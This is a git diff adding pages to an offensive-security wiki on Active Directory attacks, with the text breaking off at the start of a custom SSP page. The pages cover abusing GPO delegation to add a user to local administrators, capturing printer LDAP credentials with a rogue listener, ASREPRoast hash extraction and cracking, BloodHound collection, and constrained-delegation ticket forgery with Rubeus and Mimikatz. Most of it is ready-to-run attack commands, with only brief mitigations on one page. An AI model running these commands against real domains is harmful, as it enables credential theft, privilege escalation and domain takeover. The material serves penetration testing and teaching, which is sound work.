+Interesting to note that I could not abuse these privileges by using Active Directory module and `Set-Acl` / `Get-Acl` cmdlets:
+
+```csharp
+$path = "AD:\CN=test,CN=Users,DC=offense,DC=local"
+$acl = Get-Acl -Path $path
+$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule (New-Object System.Security.Principal.NTAccount "spotless"),"GenericAll","Allow"
+$acl.AddAccessRule($ace)
+Set-Acl -Path $path -AclObject $acl
+```
+
+![](../../.gitbook/assets/26.png)
+
+## **Replication on the domain \(DCSync\)**
+
+The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.  
+[**Learn more about the DCSync attack here.**](dcsync.md)\*\*\*\*
+
+## GPO Delegation <a id="gpo-delegation"></a>
+
+Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user:
+
+![](../../.gitbook/assets/a13.png)
+
+We can see this by leveraging PowerView like so:
+
+```bash
+Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
+```
+
+The below indicates that the user `offense\spotless` has **WriteProperty**, **WriteDacl**, **WriteOwner** privileges among a couple of others that are ripe for abuse:
+
+![](../../.gitbook/assets/a14.png)
+
+\*\*\*\*[**More about general AD ACL/ACE abuse here.**](acl-persistence-abuse.md)\*\*\*\*
+
+### Abusing the GPO Permissions <a id="abusing-the-gpo-permissions"></a>
+
+We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below:
+
+![](../../.gitbook/assets/a15.png)
+
+If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so:
+
+```bash
+Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
+```
+
+![](../../.gitbook/assets/a16.png)
+
+#### Computers with a Given Policy Applied <a id="computers-with-a-given-policy-applied"></a>
+
+We can now resolve the computer names the GPO `Misconfigured Policy` is applied to:
+
+```text
+Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}
+```
+
+![](../../.gitbook/assets/a17.png)
+
+#### Policies Applied to a Given Computer <a id="policies-applied-to-a-given-computer"></a>
+
+```text
+Get-DomainGPO -ComputerIdentity ws01 -Properties Name, DisplayName
+```
+
+![](https://blobs.gitbook.com/assets%2F-LFEMnER3fywgFHoroYn%2F-LWNAqc8wDhu0OYElzrN%2F-LWNBOmSsNrObOboiT2E%2FScreenshot%20from%202019-01-16%2019-44-19.png?alt=media&token=34332022-c1fc-4f97-a7e9-e0e4d98fa8a5)
+
+#### OUs with a Given Policy Applied <a id="ous-with-a-given-policy-applied"></a>
+
+```text
+Get-DomainOU -GPLink "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" -Properties DistinguishedName
+```
+
+![](https://blobs.gitbook.com/assets%2F-LFEMnER3fywgFHoroYn%2F-LWNAqc8wDhu0OYElzrN%2F-LWNBtLT332kTVDzd5qV%2FScreenshot%20from%202019-01-16%2019-46-33.png?alt=media&token=ec90fdc0-e0dc-4db0-8279-cde4720df598)
+
+#### Abusing Weak GPO Permissions <a id="abusing-weak-gpo-permissions"></a>
+
+One of the ways to abuse this misconfiguration and get code execution is to create an immediate scheduled task through the GPO like so:
+
+```text
+New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
+```
+
+![](../../.gitbook/assets/a19.png)
+
+The above will add our user spotless to the local `administrators` group of the compromised box. Note how prior to the code execution the group does not contain user `spotless`:
+
+![](../../.gitbook/assets/a20.png)
+
+### Force Policy Update <a id="force-policy-update"></a>
+
+ScheduledTask and its code will execute after the policy updates are pushed through \(roughly each 90 minutes\), but we can force it with `gpupdate /force` and see that our user `spotless` now belongs to local administrators group:
+
+![](../../.gitbook/assets/a21.png)
+
+### Under the hood <a id="under-the-hood"></a>
+
+If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there:
+
+![](../../.gitbook/assets/a22.png)
+
+Below is the XML file that got created by `New-GPOImmediateTask` that represents our evil scheduled task in the GPO:
+
+{% code title="\\\\offense.local\\SysVol\\offense.local\\Policies\\{DDC640FF-634A-4442-BC2E-C05EED132F0C}\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml" %}
+```markup
+<?xml version="1.0" encoding="utf-8"?>
+<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
+    <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="evilTask" image="0" changed="2018-11-20 13:43:43" uid="{6cc57eac-b758-4c52-825d-e21480bbb47f}" userContext="0" removePolicy="0">
+        <Properties action="C" name="evilTask" runAs="NT AUTHORITY\System" logonType="S4U">
+            <Task version="1.3">
+                <RegistrationInfo>
+                    <Author>NT AUTHORITY\System</Author>
+                    <Description></Description>
+                </RegistrationInfo>
+                <Principals>
+                    <Principal id="Author">
+                        <UserId>NT AUTHORITY\System</UserId>
+                        <RunLevel>HighestAvailable</RunLevel>
+                        <LogonType>S4U</LogonType>
+                    </Principal>
+                </Principals>
+                <Settings>
+                    <IdleSettings>
+                        <Duration>PT10M</Duration>
+                        <WaitTimeout>PT1H</WaitTimeout>
+                        <StopOnIdleEnd>true</StopOnIdleEnd>
+                        <RestartOnIdle>false</RestartOnIdle>
+                    </IdleSettings>
+                    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+                    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+                    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+                    <AllowHardTerminate>false</AllowHardTerminate>
+                    <StartWhenAvailable>true</StartWhenAvailable>
+                    <AllowStartOnDemand>false</AllowStartOnDemand>
+                    <Enabled>true</Enabled>
+                    <Hidden>true</Hidden>
+                    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+                    <Priority>7</Priority>
+                    <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
+                    <RestartOnFailure>
+                        <Interval>PT15M</Interval>
+                        <Count>3</Count>
+                    </RestartOnFailure>
+                </Settings>
+                <Actions Context="Author">
+                    <Exec>
+                        <Command>cmd</Command>
+                        <Arguments>/c net localgroup administrators spotless /add</Arguments>
+                    </Exec>
+                </Actions>
+                <Triggers>
+                    <TimeTrigger>
+                        <StartBoundary>%LocalTimeXmlEx%</StartBoundary>
+                        <EndBoundary>%LocalTimeXmlEx%</EndBoundary>
+                        <Enabled>true</Enabled>
+                    </TimeTrigger>
+                </Triggers>
+            </Task>
+        </Properties>
+    </ImmediateTaskV2>
+</ScheduledTasks>
+```
+{% endcode %}
+
+### Users and Groups <a id="users-and-groups"></a>
+
+The same privilege escalation could be achieved by abusing the GPO Users and Groups feature. Note in the below file, line 6 where the user `spotless` is added to the local `administrators` group - we could change the user to something else, add another one or even add the user to another group/multiple groups since we can amend the policy configuration file in the shown location due to the GPO delegation assigned to our user `spotless`:
+
+{% code title="\\\\offense.local\\SysVol\\offense.local\\Policies\\{DDC640FF-634A-4442-BC2E-C05EED132F0C}\\Machine\\Preferences\\Groups" %}
+```markup
+<?xml version="1.0" encoding="utf-8"?>
+<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
+    <Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2018-12-20 14:08:39" uid="{300BCC33-237E-4FBA-8E4D-D8C3BE2BB836}">
+        <Properties action="U" newName="" description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)">
+            <Members>
+                <Member name="spotless" action="ADD" sid="" />
+            </Members>
+        </Properties>
+    </Group>
+</Groups>
+```
+{% endcode %}
+
+Additionally, we could think about leveraging logon/logoff scripts, using registry for autoruns, installing .msi, edit services and similar code execution avenues.
+
+## References
+
+{% embed url="https://wald0.com/?p=112" %}
+
+{% embed url="https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2" %}
+
+{% embed url="https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/" %}
+
+{% embed url="https://adsecurity.org/?p=3658" %}
+
+{% embed url="https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2\#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_" %}
+
diff --git a/windows/active-directory-methodology/ad-information-in-printers.md b/windows/active-directory-methodology/ad-information-in-printers.md
new file mode 100644
index 00000000..99648fd1
--- /dev/null
+++ b/windows/active-directory-methodology/ad-information-in-printers.md
@@ -0,0 +1,303 @@
+# AD information in printers
+
+There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.  
+This is because an attacker could **trick the printer to authenticate against a rouge LDAP server** \(typically a `nc -vv -l -p 444` is enough\) and to capture the printer **credentials on clear-text**.
+
+Also, several printers will contains **logs with usernames** or could even be able to **download all usernames** from the Domain Controller.
+
+All this **sensitive information** and the common **lack of security** makes printers very interesting for attackers.
+
+Some blogs about the topic:
+
+* [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/)
+* [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
+
+**The following information was copied from** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/)\*\*\*\*
+
+## LDAP settings
+
+On Konica Minolta printers it is possible to configure an LDAP server to connect to, along with credentials. In earlier versions of the firmware on these devices I have heard it is possible to recover the credentials simply by reading the html source of the page. Now, however the credentials are not returned in the interface so we have to work a little harder.
+
+The list of LDAP Servers is under: Network &gt; LDAP Setting &gt; Setting Up LDAP
+
+The interface allows the LDAP server to be modified without re-entering the credentials that will be used to connect. I presume this is for a simpler user experience, but it gives an opportunity for an attacker to escalate from master of a printer to a toe hold on the domain.
+
+We can reconfigure the LDAP server address setting to a machine we control, and trigger a connection with the helpful “Test Connection” functionality.
+
+## Listening for the goods
+
+### netcat
+
+If you have better luck than me, you may be able to get away with a simple netcat listener:
+
+```text
+sudo nc -k -v -l -p 386
+```
+
+I am assured by [@\_castleinthesky](https://twitter.com/_castleinthesky) that this works most of the time, however I have yet to be let off that easy.
+
+### Slapd
+
+I have found that a full LDAP server is required as the printer first attempts a null bind and then queries the available information, only if these operations are successful does it proceed to bind with the credentials.
+
+I searched for a simple ldap server that met the requirements, however there seemed to be limited options. In the end I opted to setup an open ldap server and use the slapd debug server service to accept connections and print out the messages from the printer. \(If you know of an easier alternative, I would be happy to hear about it\)
+
+#### Installation
+
+\(Note this section is a lightly adapted version of the guide here [https://www.server-world.info/en/note?os=Fedora\_26&p=openldap](https://www.server-world.info/en/note?os=Fedora_26&p=openldap) \)
+
+From a root terminal:
+
+**Install OpenLDAP,**
+
+```text
+#> dnf install -y install openldap-servers openldap-clients
+
+#> cp /usr/share/openldap-servers/DB_CONFIG.example /var/lib/ldap/DB_CONFIG 
+
+#> chown ldap. /var/lib/ldap/DB_CONFIG
+```
+
+**Set an OpenLDAP admin password \(you will need this again shortly\)**
+
+```text
+#> slappasswd 
+New password:
+Re-enter new password:
+{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
+```
+
+```text
+#> vim chrootpw.ldif
+# specify the password generated above for "olcRootPW" section
+dn: olcDatabase={0}config,cn=config
+changetype: modify
+add: olcRootPW
+olcRootPW: {SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
+```
+
+```text
+#> ldapadd -Y EXTERNAL -H ldapi:/// -f chrootpw.ldif
+SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+modifying entry "olcDatabase={0}config,cn=config"
+```
+
+**Import basic Schemas**
+
+```text
+#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif 
+SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+adding new entry "cn=cosine,cn=schema,cn=config"
+
+#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/nis.ldif 
+SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+adding new entry "cn=nis,cn=schema,cn=config"
+
+#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/inetorgperson.ldif 
+SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+adding new entry "cn=inetorgperson,cn=schema,cn=config"
+```
+
+**Set your domain name on LDAP DB.**
+
+```text
+# generate directory manager's password
+#> slappasswd 
+New password:
+Re-enter new password:
+{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
+
+#> vim chdomain.ldif
+# specify the password generated above for "olcRootPW" section
+dn: olcDatabase={1}monitor,cn=config
+changetype: modify
+replace: olcAccess
+olcAccess: {0}to * by dn.base="gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth"
+read by dn.base="cn=Manager,dc=foo,dc=bar" read by * none
+
+dn: olcDatabase={2}mdb,cn=config
+changetype: modify
+replace: olcSuffix
+olcSuffix: dc=foo,dc=bar
+
+dn: olcDatabase={2}mdb,cn=config
+changetype: modify
+replace: olcRootDN
+olcRootDN: cn=Manager,dc=foo,dc=bar
+
+dn: olcDatabase={2}mdb,cn=config
+changetype: modify
+add: olcRootPW
+olcRootPW: {SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
+
+dn: olcDatabase={2}mdb,cn=config
+changetype: modify
+add: olcAccess
+olcAccess: {0}to attrs=userPassword,shadowLastChange by
+dn="cn=Manager,dc=foo,dc=bar" write by anonymous auth by self write by * none
+olcAccess: {1}to dn.base="" by * read
+olcAccess: {2}to * by dn="cn=Manager,dc=foo,dc=bar" write by * read
+
+#> ldapmodify -Y EXTERNAL -H ldapi:/// -f chdomain.ldif 
+SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+modifying entry "olcDatabase={1}monitor,cn=config"
+
+modifying entry "olcDatabase={2}mdb,cn=config"
+
+modifying entry "olcDatabase={2}mdb,cn=config"
+
+modifying entry "olcDatabase={2}mdb,cn=config"
+
+modifying entry "olcDatabase={2}mdb,cn=config"
+
+#> vim basedomain.ldif
+dn: dc=foo,dc=bar
+objectClass: top
+objectClass: dcObject
+objectclass: organization
+o: Foo Bar
+dc: DC1
+
+dn: cn=Manager,dc=foo,dc=bar
+objectClass: organizationalRole
+cn: Manager
+description: Directory Manager
+
+dn: ou=People,dc=foo,dc=bar
+objectClass: organizationalUnit
+ou: People
+
+dn: ou=Group,dc=foo,dc=bar
+objectClass: organizationalUnit
+ou: Group
+
+#> ldapadd -x -D cn=Manager,dc=foo,dc=bar -W -f basedomain.ldif 
+Enter LDAP Password: # directory manager's password
+adding new entry "dc=foo,dc=bar"
+
+adding new entry "cn=Manager,dc=foo,dc=bar"
+
+adding new entry "ou=People,dc=foo,dc=bar"
+
+adding new entry "ou=Group,dc=foo,dc=bar"
+```
+
+**Configure LDAP TLS**
+
+**Create and SSL Certificate**
+
+```text
+#> cd /etc/pki/tls/certs 
+#> make server.key 
+umask 77 ; \
+/usr/bin/openssl genrsa -aes128 2048 > server.key
+Generating RSA private key, 2048 bit long modulus
+...
+...
+e is 65537 (0x10001)
+Enter pass phrase: # set passphrase
+Verifying - Enter pass phrase: # confirm
+
+# remove passphrase from private key
+#> openssl rsa -in server.key -out server.key 
+Enter pass phrase for server.key: # input passphrase
+writing RSA key
+
+#> make server.csr 
+umask 77 ; \
+/usr/bin/openssl req -utf8 -new -key server.key -out server.csr
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [XX]: # country
+State or Province Name (full name) []: # state
+Locality Name (eg, city) [Default City]: # city
+Organization Name (eg, company) [Default Company Ltd]: # company
+Organizational Unit Name (eg, section) []:Foo Bar # department
+Common Name (eg, your name or your server's hostname) []:www.foo.bar # server's FQDN
+Email Address []:xxx@foo.bar # admin email
+Please enter the following 'extra' attributes
+to be sent with your certificate request
+A challenge password []: # Enter
+An optional company name []: # Enter
+
+#> openssl x509 -in server.csr -out server.crt -req -signkey server.key -days 3650
+Signature ok
+subject=/C=/ST=/L=/O=/OU=Foo Bar/CN=dlp.foo.bar/emailAddress=xxx@roo.bar
+Getting Private key
+```
+
+**Configure Slapd for SSL /TLS**
+
+```text
+#> cp /etc/pki/tls/certs/server.key \
+/etc/pki/tls/certs/server.crt \
+/etc/pki/tls/certs/ca-bundle.crt \
+/etc/openldap/certs/
+
+#> chown ldap. /etc/openldap/certs/server.key \
+/etc/openldap/certs/server.crt \
+/etc/openldap/certs/ca-bundle.crt
+
+#> vim mod_ssl.ldif
+# create new
+ dn: cn=config
+changetype: modify
+add: olcTLSCACertificateFile
+olcTLSCACertificateFile: /etc/openldap/certs/ca-bundle.crt
+-
+replace: olcTLSCertificateFile
+olcTLSCertificateFile: /etc/openldap/certs/server.crt
+-
+replace: olcTLSCertificateKeyFile
+olcTLSCertificateKeyFile: /etc/openldap/certs/server.key
+
+#> ldapmodify -Y EXTERNAL -H ldapi:/// -f mod_ssl.ldif 
+SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+modifying entry "cn=config"
+```
+
+**Allow LDAP through your local firewall**
+
+```text
+firewall-cmd --add-service={ldap,ldaps}
+```
+
+### The payoff
+
+Once you have installed and configured your LDAP service you can run it with the following command :
+
+> ```text
+> slapd -d 2
+> ```
+
+The screen shot below shows an example of the output when we run the connection test on the printer. As you can see the username and password are passed from the LDAP client to server.
+
+[![slapd terminal output containing the username &quot;MyUser&quot; and password &quot;MyPassword&quot;](https://i1.wp.com/grimhacker.com/wp-content/uploads/2018/03/slapd_output.png?resize=474%2C163&ssl=1)](https://grimhacker.com/2018/03/08/just-a-printer/slapd_output/)
+
+## How bad can it be?
+
+This very much depends on the credentials that have been configured.
+
+If the principle of least privilege is being followed, then you may only get read access to certain elements of active directory. This is often still valuable as you can use that information to formulate further more accurate attacks.
+
+Typically you are likely to get an account in the Domain Users group which may give access to sensitive information or form the prerequisite authentication for other attacks.
+
+Or, like me, you may be rewarded for setting up an LDAP server and be handed a Domain Admin account on a silver platter.
+
diff --git a/windows/active-directory-methodology/asreproast.md b/windows/active-directory-methodology/asreproast.md
new file mode 100644
index 00000000..37f5c4c4
--- /dev/null
+++ b/windows/active-directory-methodology/asreproast.md
@@ -0,0 +1,51 @@
+# ASREPRoast
+
+## ASREPRoast
+
+The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute \(**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**\)**_.
+
+That means that anyone can send an AS\_REQ request to the DC on behalf of any of those users, and receive an AS\_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
+
+Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.
+
+#### Enumerating vulnerable users \(need domain credentials\)
+
+```bash
+Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
+```
+
+#### Request AS\_REP message
+
+{% code title="Using Linux" %}
+```bash
+#Try all the usernames in usernames.txt
+python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
+#Use domain creds to extract targets and target them
+python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
+```
+{% endcode %}
+
+{% code title="Using Windows" %}
+```bash
+.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
+Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
+```
+{% endcode %}
+
+### Cracking
+
+```text
+john --wordlist=passwords_kerb.txt hashes.asreproast
+hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
+```
+
+### Persistence
+
+Force **preauth** not required for a user where you have **GenericAll** permissions \(or permissions to write properties\):
+
+```bash
+Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
+```
+
+\*\*\*\*[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/bloodhound.md b/windows/active-directory-methodology/bloodhound.md
new file mode 100644
index 00000000..b92a8cab
--- /dev/null
+++ b/windows/active-directory-methodology/bloodhound.md
@@ -0,0 +1,83 @@
+# BloodHound
+
+## What is BloodHound
+
+> BloodHound is a single page Javascript web application, built on top of [Linkurious](http://linkurio.us/), compiled with [Electron](http://electron.atom.io/), with a [Neo4j](https://neo4j.com/)database fed by a PowerShell ingestor.
+>
+> BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.
+>
+> BloodHound is developed by [@\_wald0](https://www.twitter.com/_wald0), [@CptJesus](https://twitter.com/CptJesus), and [@harmj0y](https://twitter.com/harmj0y).
+>
+> From [https://github.com/BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
+
+So, [Bloodhound ](https://github.com/BloodHoundAD/BloodHound)is an amazing tool which can enumerate a domain automatically, save all the information, find possible privilege escalation paths and show all the information using graphs.
+
+Booldhound is composed of 2 main parts: The **ingestors** and the **visualisation application**.  
+The **ingestors** are called SharpHound and are the applications \(PS1 and C\# exe\) used to **enumerate the domain and extract all the information** in a format that the visualisation application will understand.  
+The **visualisation application uses neo4j** to show how all the information is related and to show different ways to escalate privileges in the domain.
+
+## Installation
+
+You can download the [Ingestors from the github](https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors).
+
+To install the visualisation application you will need to install **neo4j** and the **bloodhound application**.  
+The easiest way to do this is just doing:
+
+```text
+apt-get install bloodhound
+```
+
+But, at the time of this writing, this wont install the latest bloodhound, so you may need to **download a pre-compiled bloodhound latest version** from: [https://github.com/BloodHoundAD/BloodHound/releases](https://github.com/BloodHoundAD/BloodHound/releases) or [compile it from the source](https://github.com/BloodHoundAD/BloodHound/wiki/Building-BloodHound-from-source).  
+You can **download the community version of neo4j** from [here](https://neo4j.com/download-center/#community).
+
+**If** you **download** by your own **bloodhound from releases** and n**eo4j from the web** page \(instead of using `apt-get`\) you will need to **decompress** the downloaded **files** to access the executables.
+
+## Visualisation app Execution
+
+After downloading/installing the required applications, lets start them.  
+First of all you need to **start the neo4j database**:
+
+```bash
+./bin/neo4j start
+#or
+service neo4j start
+```
+
+The first time that you start this database you will need to access [http://localhost:7474/browser/](http://localhost:7474/browser/). You will be asked default credentials \(neo4j:neo4j\) and you will be **required to change the password**, so change it and don't forget it.
+
+Now, start the **bloodhound application**:
+
+```bash
+./BloodHound-linux-x64
+#or
+bloodhound
+```
+
+You will be prompted for the database credentials: **neo4j:&lt;Your new password&gt;**
+
+  
+  
+****And bloodhound will be ready to ingest data.
+
+![](../../.gitbook/assets/image%20%28246%29.png)
+
+## Ingestors
+
+You can download the [Ingestors from the github](https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors).  
+They have several options but if you want to run SharpHound from a PC joined to the domain, using your current user and extract all the information you can do:
+
+```text
+./SharpHound.exe --CollectionMethod All
+Invoke-BloodHound -CollectionMethod All
+```
+
+If you wish to execute SharpHound using different credentials you can create a CMD netonly session and run SharpHound from there:
+
+```text
+runas /netonly /user:domain\user "powershell.exe -exec bypass"
+```
+
+You could also use other parameters like: **DomainController**, **Domain**, **LdapUsername**, **LdapPassword...**
+
+\*\*\*\*[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/constrained-delegation.md b/windows/active-directory-methodology/constrained-delegation.md
new file mode 100644
index 00000000..2aa89e4e
--- /dev/null
+++ b/windows/active-directory-methodology/constrained-delegation.md
@@ -0,0 +1,56 @@
+# Constrained Delegation
+
+## Constrained Delegation
+
+Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine.
+
+* **Service for User to self \(**_**S4U2self**_**\):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300%28v=vs.85%29.aspx) \(T2A4D\), then it can obtains a TGS for itself \(the service\) on behalf of any other user.
+* **Service for User to Proxy\(**_**S4U2proxy**_**\):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
+
+**Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated_ ’ in AD, you will **not be able to impersonate** them.
+
+This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** \(possible **privesc**\).  
+Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one** \(because the SPN is not being checked, only privileges\). For example, if you have access to **CIFS service** you can also have access to **HOST service**.  
+Moreover, notice that if you have access to **LDAP service on DC**, you will have enough privileges to exploit a **DCSync**.
+
+{% code title="Enumerate from Powerview" %}
+```bash
+Get-DomainUser -TrustedToAuth
+Get-DomainComputer -TrustedToAuth
+```
+{% endcode %}
+
+{% code title="Using kekeo.exe + Mimikatz.exe" %}
+```bash
+#Obtain a TGT for the Constained allowed user
+tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
+#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
+tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
+#Load the TGS in memory
+Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'  
+```
+{% endcode %}
+
+{% code title="Using Rubeus" %}
+```bash
+#Obtain a TGT for the Constained allowed user
+.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
+#Obtain a TGS of the Administrator user to self
+.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
+#Obtain service TGS impersonating Administrator (CIFS)
+.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
+#Impersonate Administrator on different service (HOST)
+.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
+#Load ticket in memory
+.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
+```
+{% endcode %}
+
+### Mitigation
+
+* Disable kerberos delegation where possible
+* Limit DA/Admin logins to specific services
+* Set "Account is sensitive and cannot be delegated" for privileged accounts.
+
+\*\*\*\*[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/custom-ssp.md b/windows/active-directory-methodology/custom-ssp.md
new file mode 100644
index 00000000..5c6a7a8d
--- /dev/null
+++ b/windows/active-directory-methodology/custom-ssp.md
@@ -0,0 +1,45 @@
+# Custom SSP
+
+## Custom SSP
+
+[Learn what is a SSP \(Security Support Provider\) here.](../credentials.md#security-support-provider-interface-sspi)  
+You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
